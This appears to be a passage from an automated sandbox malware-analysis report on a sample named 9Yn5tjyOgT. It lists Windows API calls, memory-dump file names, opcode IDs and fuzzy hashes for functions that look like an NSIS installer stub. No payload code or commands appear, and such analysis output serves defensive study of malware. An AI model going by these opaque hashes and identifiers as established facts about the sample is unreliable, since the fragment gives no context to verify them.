                                                                                                                    • GetFileAttributesW.KERNEL32(00425F30,00425F30,00425F30,00425F30,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,76232EE0,00405B1A,?,00437800,76232EE0), ref: 00405E2E
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                    • String ID: 0_B
                                                                                                                    • API String ID: 3248276644-2128305573
                                                                                                                    • Opcode ID: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                                    • Instruction ID: e2ef3bf648e1011fa726b67e088789f036b8871ba300d86fb9c867912b04298b
                                                                                                                    • Opcode Fuzzy Hash: df6e64e4f6769b316d4c1c7beb25aaa03b2c49ca2ab4503c480f7fe4b4eab687
                                                                                                                    • Instruction Fuzzy Hash: B4F0F439109E5116D62233365D09BEF0548CF82354B5A853BFC91B22D2DB3C8A539DFE
                                                                                                                    APIs
                                                                                                                    • IsWindowVisible.USER32(?), ref: 004053F3
                                                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 00405444
                                                                                                                      • Part of subcall function 004043AB: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043BD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                    • Opcode ID: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                                    • Instruction ID: 343f6187318c33bb175646012d6cb398530476c6c15fe8dd96994d534b9a6b17
                                                                                                                    • Opcode Fuzzy Hash: 36caebe1fe8aa1eff7ff321662443c514d6827d4f2801b7b393fcb4226acda68
                                                                                                                    • Instruction Fuzzy Hash: CC0171B1200609ABDF305F11DD84B9B3666EBD4356F508037FA00761E1C77A8DD29A6E
                                                                                                                    APIs
                                                                                                                    • GetTickCount.KERNEL32 ref: 00405F2B
                                                                                                                    • GetTempFileNameW.KERNEL32(?,?,00000000,?,?,?,00435000,004034A3,00437000,00437800,00437800,00437800,00437800,00437800,76233420,004036EF), ref: 00405F46
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CountFileNameTempTick
                                                                                                                    • String ID: nsa
                                                                                                                    • API String ID: 1716503409-2209301699
                                                                                                                    • Opcode ID: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                    • Instruction ID: 076564571966e4dc9ef4834731be4d502634ae0aeddccfca5b4533d1bab5a213
                                                                                                                    • Opcode Fuzzy Hash: 0c62091ad8b50aef506abc269e58e4a43f33256201187c1c154fac6de66d8f01
                                                                                                                    • Instruction Fuzzy Hash: 14F09076601204FFEB009F59ED05E9BB7A8EB95750F10803AEE00F7250E6B49A548B68
                                                                                                                    APIs
                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426730,Error launching installer), ref: 004059FA
                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00405A07
                                                                                                                    Strings
                                                                                                                    • Error launching installer, xrefs: 004059E4
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateHandleProcess
                                                                                                                    • String ID: Error launching installer
                                                                                                                    • API String ID: 3712363035-66219284
                                                                                                                    • Opcode ID: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                    • Instruction ID: 166b032e71181ba573d10d742cd21a74b10ba840f41c43b266edefbe5b435367
                                                                                                                    • Opcode Fuzzy Hash: 6d78ed6c6b667bfe634139d4e18f22187190c1a967eebebbcf2d401a0833c7e8
                                                                                                                    • Instruction Fuzzy Hash: E5E04FB0A102097FEB009B64ED49F7B76ACFB04208F404531BD00F2150D774A8208A7C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                    • Instruction ID: 2bd06e12bed6e0bcd81d630d0cd78bd49004ac77cb8b5ebb757de7108a839e92
                                                                                                                    • Opcode Fuzzy Hash: db40346bc9fd20083a39152eff8b5ac78f5cdc0ebc59631a5c9ad52422038ace
                                                                                                                    • Instruction Fuzzy Hash: 1DA14471E04228CBDF28CFA8C8446ADBBB1FF44305F14806ED856BB281D7786A86DF45
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                    • Instruction ID: f1da02a2f8b93330a3d469e31e6e9edf047fa596270f1f1d86c95cc791e20b04
                                                                                                                    • Opcode Fuzzy Hash: 9d32937a43efcd2dea5d1fc698e3fcc0023127280f8acdc5c544d8c7d1790a46
                                                                                                                    • Instruction Fuzzy Hash: AA910271E04228CBEF28CF98C8447ADBBB1FB45305F14816AD856BB291C778A986DF45
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                    • Instruction ID: fb1d02f26201205f5bfcbd3029eb7cfad7cca69a3f8c46de7b35964bdd0c3f7d
                                                                                                                    • Opcode Fuzzy Hash: 67d6f810e310069c411d265ffcddf6abea8090fb20e8d2db1667143610fe5bd5
                                                                                                                    • Instruction Fuzzy Hash: 18814571E04228DFDF24CFA8C844BADBBB1FB45305F24816AD856BB291C7389986DF45
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                    • Instruction ID: 55fc176551b00f8465723d30588461dcf2fc1d3195b414c524ee7a2fcbdbe87b
                                                                                                                    • Opcode Fuzzy Hash: 5328a0701a0a32b67c374057837e60552721ea1a6811a44abe83e42546375677
                                                                                                                    • Instruction Fuzzy Hash: 39815971E04228DBEF24CFA8C844BADBBB1FB45305F14816AD856BB2C1C7786986DF45
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                    • Instruction ID: 7645ab34ef40ba223d211dbe726f8302725d3f31b3e808d93cc70016d3e0d248
                                                                                                                    • Opcode Fuzzy Hash: a445a859154d96951751bba7131c1a69e0b73c0895ac35a4e96b2d7ee743491b
                                                                                                                    • Instruction Fuzzy Hash: 10711471E04228DBDF24CF98C8447ADBBB1FF49305F15806AD856BB281C7389A86DF45
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                    • Instruction ID: a4e19b7408f2815589132e7e2b866ae2b9c8caa40868d81b8a4623295251dea3
                                                                                                                    • Opcode Fuzzy Hash: cd7d90a79d0f10410712768d5bba8e0713d9e8f593557aa9bf16db43d4616d0f
                                                                                                                    • Instruction Fuzzy Hash: 0D712571E04218DBEF28CF98C844BADBBB1FF45305F15806AD856BB281C7389986DF45
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                    • Instruction ID: 979076adb26e5f1e3e7a9458f232081f51f9a0722543042d1d726f4d31452a21
                                                                                                                    • Opcode Fuzzy Hash: 08b8d2b65a0c1c30b5e83c7ea62cdb0658c0fab8542c410d93f606ef21acc8e7
                                                                                                                    • Instruction Fuzzy Hash: 50714871E04228DBEF28CF98C8447ADBBB1FF45305F15806AD856BB281C7386A46DF45
                                                                                                                    APIs
                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405E6B
                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E7C
                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000006.00000002.3405652812.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000006.00000002.3405634207.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405673525.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405689900.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000006.00000002.3405715419.0000000000455000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_6_2_400000_9Yn5tjyOgT.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 190613189-0
                                                                                                                    • Opcode ID: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                    • Instruction ID: 3eb9f18af2c16f81f4dc7877ab3147293eaebe45f2d41041cd024b5e05e36bdf
                                                                                                                    • Opcode Fuzzy Hash: 7e71a0af936693ae9f9191b5a8beeb80aa55241a483ed2e2c495a4152d25f7df
                                                                                                                    • Instruction Fuzzy Hash: 4AF0C831100514AFC7029B94DD4099FBBA8DF06354B25407AE844FB211D634DF01AB98